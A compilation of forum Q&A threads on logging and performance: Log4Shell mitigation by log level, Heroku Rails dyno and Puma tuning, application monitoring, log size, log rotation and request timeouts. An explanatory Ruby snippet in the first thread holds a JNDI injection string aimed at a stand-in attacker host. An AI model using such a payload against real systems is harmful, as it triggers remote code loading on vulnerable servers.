I believe I saw it mentioned in one of the security advisories about CVE-2021-44228 that reducing the logging level to ERROR or below can mitigate the vulnerability to some degree. I can't seem to find the same advisory again; possibly that piece of information has been removed since.
I found this explanation of CVE-2021-44228 which claims, about exploitable log entries, that "the server logs this at the INFO level."
Would reducing the logging level to ERROR or below mitigate the vulnerability somewhat?
My understanding is that the attacker would need to trigger a logger.error() call to inject a command, which is still possible, but less likely than with the INFO level.
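For what it's worth, here is a minimal sketch of that level-threshold reasoning using Ruby's standard Logger. This is an analogy only, not Log4j, and the attacker-controlled header value is hypothetical: messages below the configured level are discarded before they are processed, so raising the level to ERROR narrows the window but does not close it.

```ruby
require "logger"

logger = Logger.new($stdout)
logger.level = Logger::ERROR  # threshold raised from the usual INFO/DEBUG

user_input = "${jndi:ldap://attacker.example/a}"  # hypothetical attacker-controlled value

# Block form: the block is only evaluated when the severity clears the threshold,
# so this INFO entry is never built or passed on to the logging pipeline.
logger.info { "User-Agent: #{user_input}" }

# ERROR-level entries still go through, so attacker-controlled data that reaches
# an error log line is still processed; the mitigation is only partial.
logger.error { "Failed request from User-Agent: #{user_input}" }
```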
I've set a client up with Heroku for their Ruby on Rails application and have had a great deal of trouble over the years: the application does not run well regardless of how much money we spend on additional resources, and I find Heroku's terminology and documentation highly confusing. We are constantly getting "H12" and "R14" errors, and memory usage and dyno load are constantly spiking, yet this is a small to medium-sized business without a massive amount of traffic. I'm wondering if anybody out there who does understand the ins and outs of Heroku can look this configuration over and tell me if it makes sense:
DB_POOL: 10
MALLOC_ARENA_MAX: 2
RAILS_MAX_THREADS: 5
WEB_CONCURRENCY: 4
Ruby 2.7
Rails 6.0
Puma
8 2x web dynos
5 1x worker dynos
$50 Postgres standard 0 database
$15 Memcachier
$10 Rediscloud
...etc addons
Your WEB_CONCURRENCY is too high for your Standard-2x dynos. The recommended default is 2: https://devcenter.heroku.com/articles/deploying-rails-applications-with-the-puma-web-server#recommended-default-puma-process-and-thread-configuration
This is likely contributing to your R14 errors, since higher web concurrency means more memory usage. So you need to either lower your web concurrency (which may mean you also need to increase the # of dynos to compensate) or use bigger dynos.
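For reference, a config/puma.rb along the lines of Heroku's recommended defaults might look like the sketch below; the numbers mirror the defaults from the linked article (2 workers, 5 threads) rather than anything tuned for this particular app.

```ruby
# config/puma.rb -- a minimal sketch following Heroku's recommended defaults
workers Integer(ENV.fetch("WEB_CONCURRENCY", 2))    # 2 Puma processes per Standard-2x dyno

threads_count = Integer(ENV.fetch("RAILS_MAX_THREADS", 5))
threads threads_count, threads_count

preload_app!                                        # copy-on-write memory sharing between workers

port        ENV.fetch("PORT", 3000)
environment ENV.fetch("RACK_ENV", "production")

on_worker_boot do
  # Re-establish Active Record connections in each forked worker.
  ActiveRecord::Base.establish_connection
end
```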
You already have MALLOC_ARENA_MAX=2, but I'm not sure if you are using jemalloc. You might want to try that too.
Of course, you may also have other memory issues in your app - check out some tips here. I also recommend adding a monitoring tool like AppSignal as it's capable of tracking memory allocations per transaction.
For mitigating H12s:
Ensure you have installed something like the rack-timeout gem, which ensures that a long-running request is dropped at the dyno level and thus avoids the H12 error (you get a Rack::Timeout exception instead). Set the timeout to 15s so that it is well under the 30s H12 timeout (see the configuration sketch after this list).
Investigate your slow transactions. A monitoring tool is key here, e.g. New Relic (start with the lowest-priced paid plan; the free plan does not allow transaction tracing). Here is their blog post on how to trace transactions.
When you've identified the problem - fix it!
if the bottleneck is external:
check for external API limits and throttling
add timeouts and make app resilient to slow external responses
if the bottleneck is due to the database:
optimize slow queries
check cache hit rates
check for the # of waiting connections and db locks -> if the number of waiting connections is consistently above 0 for X minutes, that indicates you have some long locks that you'll need to investigate. Waiting connections are easiest to track over time with Librato (the free plan should do fine)
if the bottleneck is other app code:
add more custom instrumentation to get more insights, e.g. New Relic instructions
address app code issues
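As mentioned above, the rack-timeout setup can be as small as the sketch below. The 15-second value mirrors this answer's suggestion; note that the exact configuration mechanism varies between rack-timeout versions, so treat this as a sketch rather than the canonical setup.

```ruby
# Gemfile -- in a Rails app, rack-timeout inserts its middleware automatically.
gem "rack-timeout"

# Configure the timeout itself through the environment (recent rack-timeout
# versions read this; older versions used Ruby-level settings, so check the
# README for the version you install). 15s keeps the app-level timeout well
# under Heroku's 30-second H12 router cutoff:
#
#   RACK_TIMEOUT_SERVICE_TIMEOUT=15
```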
I want to stress the importance of monitoring tools to help diagnose issues and determine optimal resource usage. Figuring out things like the correct concurrency configs and the correct size and # of dynos to run is virtually impossible without proper monitoring tools. Hopefully you already have some covered by the "...etc addons" you didn't list, but if you do not, I'll summarize my recommendations and mention a couple of other tips:
To get more metrics info, ensure you have enabled log-runtime-metrics
Also enable Ruby language metrics
Add a monitoring tool that can track Ruby memory allocations like AppSignal. Scout APM can do this too but I think their plans capable of this are more expensive (requires Scout Insights feature)
Add the lowest-paid version of New Relic. This is my go-to tool for transaction tracing. AppSignal can do this too if you don't want to pay for another tool, but I find it easier with New Relic.
Add Librato. It offers some great charts out of the box, including a set of Postgres charts in its own dashboard.
Set alerts in your monitoring apps to warn you about things like response times so you can look into them!
And of course, make all your changes in staging first AND load test them to see the impacts of your changes before attempting in production!
Update: I also just noticed that you said you are using Standard-0 Postgres, which has a 120-connection limit. So if you end up lowering your WEB_CONCURRENCY and increasing the # of dynos, watch out for your total connections to that database. Beyond the fact that there is a hard limit, more connections also mean more overhead for your db, so if you are close to the connection limit you are more likely to see db performance suffer. You may want to upgrade to a plan with a higher connection limit or use pgbouncer as your connection pooler to stay under the limit.
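To make the connection math concrete, here is a rough back-of-the-envelope sketch using the numbers from the question. It assumes roughly one Postgres connection per Puma thread per worker process and ignores the worker dynos (whose job concurrency isn't given), so treat it as an estimate only.

```ruby
# Rough web-tier connection estimate (a sketch: assumes ~1 connection per Puma
# thread per worker process; background worker dynos would add to this).
web_dynos        = 8  # Standard-2x web dynos
web_concurrency  = 4  # Puma worker processes per dyno (WEB_CONCURRENCY)
threads_per_proc = 5  # RAILS_MAX_THREADS

puts web_dynos * web_concurrency * threads_per_proc
# => 160, already over Standard-0's 120-connection limit before worker dynos

# With the recommended WEB_CONCURRENCY=2 on Standard-2x dynos:
puts web_dynos * 2 * threads_per_proc
# => 80, which leaves some headroom for background workers
```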
We are in the process of building a high-performance web application.
Unfortunately, there are times when performance unexpectedly degrades and we want to be able to monitor this so that we can proactively fix the problem when it occurs, as opposed to waiting for a user to report the problem.
So far, we are putting in place system monitors for metrics such as server memory usage, CPU usage and for gathering statistics on the database.
Whilst these show the overall health of the system, they don't help us when one particular user's session is slow. We have implemented tracing in our C# application, which is particularly useful for identifying issues where data is the culprit, but for performance reasons tracing is off by default and only enabled when we are trying to fix a problem.
So my question is: are there any other best practices that we should be considering (WMI, for instance)? Is there anything else we should consider building into our web app that will benefit us without itself becoming a performance burden?
This depends a lot on your application, but I would always suggest adding your application's own metrics to your monitoring. For example, the number of recent picture uploads or the number of concurrent users - I think you get the idea. Seeing application-specific metrics in combination with server metrics like memory or CPU sometimes gives valuable insights.
In addition to system health monitoring (using Nagios) of parameters such as load, disk space, etc., we have built in a REST service, called from Nagios, that provides statistics on
transactions per second (which makes sense in our case)
number of active sessions
the number of errors in the logs per minute
....
in short, anything that is specific to the application(s)
monitor the time it takes for a (dummy) round-trip transaction: as if a user or system were performing the business function
All this data is sent back to Nagios, where we then configure alert levels and notifications.
We find that monitoring the number of Error entries in the logs gives some excellent short term warnings of a major crash/issue on the way for a lot of systems.
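As a rough illustration of the kind of endpoint described above, here is a minimal sketch in Ruby/Sinatra of a stats service an external monitor like Nagios could poll. The route, metric names, and hard-coded values are invented for the example; the original answer doesn't show its actual implementation.

```ruby
# stats_service.rb -- illustrative only: a tiny application-stats endpoint for an
# external monitor (e.g. Nagios) to poll. Real values would come from the app's
# own stores (database, Redis counters, parsed logs, a scripted dummy transaction).
require "sinatra"
require "json"

get "/stats" do
  content_type :json
  {
    transactions_per_second: 42,    # e.g. derived from a rolling counter
    active_sessions:         317,   # e.g. a count from the session store
    log_errors_per_minute:   0,     # e.g. tallied from the application logs
    dummy_round_trip_ms:     125    # e.g. timing of a scripted business transaction
  }.to_json
end
```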
Many of our customers use Systems and Application Monitor, which handles the health monitoring, along with Synthetic End User Monitor, which runs continuous synthetic transactions to show you the performance of a web application from the end-user's perspective. It works for apps outside and behind the firewall. Users often tell us that SEUM will reveal availability problems from certain locations, or at certain times of day. You can download a free trial at SolarWinds.com.
I hope this question isn't too vague, but does logging in a production environment cause a performance hit? In addition to the traditional production.log logging, we record a couple of additional things in begin/rescue-type events to help us debug issues.
In our production.rb file, our settings are:
config.log_level = :info
config.active_support.deprecation = :log
And we also have some:
TRACKER_LOG.warn xml_response_hash
These files can become quite large (1 or 2 GB each) and our website receives a couple million page views a month. Could minimizing our use of logs in production help with performance?
Logging does impact on performance, but it can still be useful in production if it allows the people running the service to diagnose problems without taking the service down.
That said, a couple of million hits a month is less than 100k per day (on average) and that shouldn't be too much of a worry. Similarly, a few GB of log files should not be a worry provided the service is deployed sanely — and provided you're using a log rotation strategy of course — since disk space is pretty cheap. Thus at current levels, I'd suggest you should be OK. Keep an eye on it though; if traffic suddenly spikes (e.g., to 1M hits in a normal day) you could have problems. Document this! You don't want the production people to be surprised by these sorts of things.
Consider making the extra logging conditional on a flag that you can disable or enable at runtime so that you only collect anything large if you're looking for it; with usual volumes of logging data there's a good chance that you'll only look for problems occasionally anyway.
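As a rough sketch of that idea applied to the TRACKER_LOG example from the question: guard the expensive call with a switch that can be flipped without a deploy. The flag-file name and helper below are invented for the illustration; a Redis key or a feature-flag library would work just as well.

```ruby
# config/initializers/tracker_log.rb (a sketch; TRACKER_LOG mirrors the logger
# named in the question, the verbose_tracking? helper is invented for this example)
TRACKER_LOG = ActiveSupport::Logger.new(Rails.root.join("log", "tracker.log"))

def verbose_tracking?
  # Toggle at runtime by creating or deleting tmp/verbose_tracking.txt on the server.
  File.exist?(Rails.root.join("tmp", "verbose_tracking.txt"))
end

# At the call site, only serialize and write the large payload when enabled:
TRACKER_LOG.warn(xml_response_hash.inspect) if verbose_tracking?
```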
I have a Rails app where the speed of the application decreases significantly as the size of the log file increases. I currently need to delete (back up) my log file frequently to prevent this. What is the best practice for avoiding this?
Regards,
Pankaj
In a production environment, the ideal is to set up logrotate rules for those logs (preferably rotating daily).
We do it and never had performance issues due to logs.
Here's a brief article on how to use it.
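If you'd rather avoid managing logrotate yourself, Ruby's Logger (which Rails builds on) can rotate its own files; a minimal sketch, with the file count and size limit chosen arbitrarily for the example (older Rails versions may use a different logger class):

```ruby
# config/environments/production.rb (a sketch; keeps 5 rotated files of ~100 MB
# each, numbers chosen arbitrarily for the example)
config.logger = ActiveSupport::Logger.new(
  Rails.root.join("log", "production.log"),
  5,             # number of old log files to keep
  100.megabytes  # rotate once the file reaches this size
)
```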
We are using Rails 2.3.5 and have been experiencing seemingly random Timeout::Error: execution expired errors. The errors reported by Hoptoad are not consistently in any particular controller and show up everywhere from user sessions to account settings to some of our core functionality controllers.
The vast majority of requests do not Timeout but there are enough to cause concern.
Is this normal? If so, what are some things to look at to decrease the occurrence? If not, has anyone run into this, and what are some common problems that can trigger an error like this?
It is normal for requests to time out if your server is running under a heavy load. You should look to see if the timeouts coincide with long-running SQL requests or some other activity that takes a lot of time. Often, you can reduce the number of timeouts by upgrading your hardware or by optimizing your code in general. If you can't upgrade your hardware, try optimizing your longest-running and most frequently accessed actions.
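One low-tech way to see which actions are involved is an around_filter that logs anything over a threshold. This is only a sketch: the 5-second cutoff and the log format are arbitrary choices, and it uses around_filter because the question is on Rails 2.3; a proper monitoring tool would give you far more detail.

```ruby
# app/controllers/application_controller.rb (a sketch for Rails 2.3-era apps;
# logs any action slower than an arbitrary 5-second threshold)
class ApplicationController < ActionController::Base
  around_filter :log_slow_requests

  private

  def log_slow_requests
    started = Time.now
    yield
  ensure
    elapsed = Time.now - started
    if elapsed > 5 # seconds
      logger.warn("SLOW REQUEST #{controller_name}##{action_name} took #{'%.1f' % elapsed}s")
    end
  end
end
```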